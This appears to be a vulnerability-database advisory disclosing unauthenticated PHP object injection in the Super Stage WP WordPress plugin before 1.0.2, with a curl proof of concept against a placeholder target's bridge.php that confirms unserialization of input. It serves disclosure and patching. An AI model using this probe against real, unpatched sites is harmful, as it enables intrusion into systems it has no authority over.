Super Stage WP < 1.0.2 – Unauthenticated PHP Object Injection | CVE 2026-1542 | Plugin Vulnerabilities

Description

The plugin unserializes user input via REQUEST, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

Test payload: `a:1:{s:4:"test";s:5:"hello";}`
Base64: `YToxOntzOjQ6InRlc3QiO3M6NToiaGVsbG8iO30=`

```
curl -s "http://TARGET/wp-content/plugins/super-stage-wp/Staging/bridge/bridge.php?data=YToxOntzOjQ6InRlc3QiO3M6NToiaGVsbG8iO30="
```

Response:

`<WPSSHEADER>YToxOntzOjU6ImVycm9yIjtzOjIxOiJjb3VsZCBub3QgZmluZCBhY3Rpb24iO30=</ENDWPSSHEADER>`

Decoded: `a:1:{s:5:"error";s:21:"could not find action";}`

This confirms:

- Endpoint is publicly accessible
- Data parameter is base64-decoded and unserialized
- No authentication required

Affects Plugins

Fixed in 1.0.2

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

yiğit ibrahim sağlam

Submitter

yiğit ibrahim sağlam

Submitter website

https://ibrahimsql.com

Submitter twitter

Verified

Yes

WPVDB ID

d6e3041f-62e8-49ba-8806-59a1c07ec43d

Timeline

Publicly Published

2026-02-06 (about 1 month ago)

Added

2026-01-30 (about 1 month ago)

Last Updated

2026-03-03 (about 17 days ago)

Other

Published

Title

Published

2026-03-03

Title

Grand Wedding <= 3.1.0 - Unauthenticated PHP Object Injection

Published

2025-03-11

Title

Workreap < 3.2.6 - Unauthenticated Privilege Escalation

Published

2025-07-15

Title

Visual Art | Gallery WordPress Theme <= 2.4 - Authenticated (Subscriber+) PHP Object Injection

Published

2025-07-30

Title

Content Egg < 8.0.0 - Authenticated (Editor+) PHP Object Injection

Published

2024-08-27

Title

Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider < 2.0.4 - Unauthenticated PHP Object Injection